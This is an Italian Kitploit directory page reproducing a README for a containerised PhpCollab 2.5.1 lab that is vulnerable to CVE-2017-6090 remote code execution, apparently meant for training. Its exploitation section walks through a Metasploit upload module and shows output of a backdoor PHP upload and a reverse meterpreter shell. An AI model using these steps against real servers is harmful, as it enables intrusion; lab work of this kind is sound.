Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
exploit-CVE-2017-6090 — PhpCollab containerizzato sfruttabile | Kitploit
Strumenti/GitHubGitHub/jlk/exploit-cve-2017-6090
Sicurezza dei ContenitoriFramework di ExploitAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubjlk/exploit-cve-2017-6090

exploit-CVE-2017-6090

PhpCollab containerizzato sfruttabile

Vedi Repository
18 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-6090 sfruttabile containerizzato

Docker Pulls License

Questo progetto costruisce un container che esegue PhpCollab 2.5.1, contenente una vulnerabilità di esecuzione di codice remoto come descritto in CVE-2017-6090. Inoltre, c'è un file docker-compse per avviare quel container e mysql per mostrare la demo, e le istruzioni per lo sfruttamento sono riportate di seguito.

Build

docker build -t containername . o usa l'immagine jlkinsel/exploit-cve-2017-6090

Esecuzione e configurazione

Il modo più semplice per mettere in funzione questa cosa è usare il file docker-compose.yml incluso. Se mi annoio a un certo punto - o le persone mostrano interesse - creerò un deployment Kubernetes o un Helm chart.

Quindi, per avviare le cose:

root@kitploit:~
docker-compose up

Fin qui tutto bene! Ora, phpcollab deve essere configurato per usare il database, e gli deve essere assegnata una password di amministrazione predefinita. Ho (brevemente) provato ad automatizzare questo, ma...beh...sembra che tu sappia usare un browser...

  • Naviga su http://localhost:8088
  • Scorri fino alla fine della GPL, clicca sulla casella 'Installazione offline' e poi clicca su Step 2
  • Inserisci i seguenti dati nei campi, poi clicca su Salva:

Infine, puoi accedere e curiosare, ma non è necessario per lo sfruttamento.

Nota

Nota che questa composizione docker non sta facendo nulla di speciale per lo storage. Se desideri rendere persistente il database mysql, dovrai aggiungere una definizione di volume alla definizione del servizio mysql in docker-compose.yml. Vedi esempi sulla pagina docker hub di mariadb

Sfruttamento

Prima - segui Esecuzione e configurazione sopra per mettere in esecuzione l'applicazione.

Non ho aggiunto un exploit in questo progetto, perché, beh, Metasploit.

Nuovo in MSF? Ecco una rapida panoramica dello sfruttamento del container che abbiamo appena avviato:

root@kitploit:~
docker run -ti --network exploitcve20176090_default remnux/metasploit

Ci vogliono alcuni minuti per avviare tutto. La pagina docker hub di remnux/metasploit spiega come usare i volumi in modo che non richieda così tanto tempo in futuro. Ma siamo quasi ora!

Una volta ottenuto un prompt della shell, continuiamo:

root@kitploit:~
# msfconsole
msf5 > use exploit/unix/webapp/phpcollab_upload_exec
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGET 0
TARGET => 0
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RHOST phpcollab
RHOST => phpcollab
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGETURI /
TARGETURI => /
msf5 exploit(unix/webapp/phpcollab_upload_exec) > exploit

[*] Started reverse TCP handler on 172.31.0.4:4444
[*] Uploading backdoor file: 1.wGvfKLDyWHL.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 172.31.0.2
[+] Deleted 1.wGvfKLDyWHL.php

meterpreter >

A questo punto, sei dentro, e i giochi possono iniziare.

Nota

Se il nome di questa directory è diverso da "exploit-CVE-2017-6090" dovrai cambiare il comando --network sopra.

Inoltre - sì, impostiamo la porta remota a 80 in msfconsole, anche se esternamente è 8088. Il container metasploit è sulla stessa rete del container phpcollab.

Scarica lo strumento
Campovalore
Server databasemysql
Login databasephpcollab
Password databasechangeme
Nome databasephpcollab
NotificheFalse
Password amministratorechangeme (o quello che vuoi)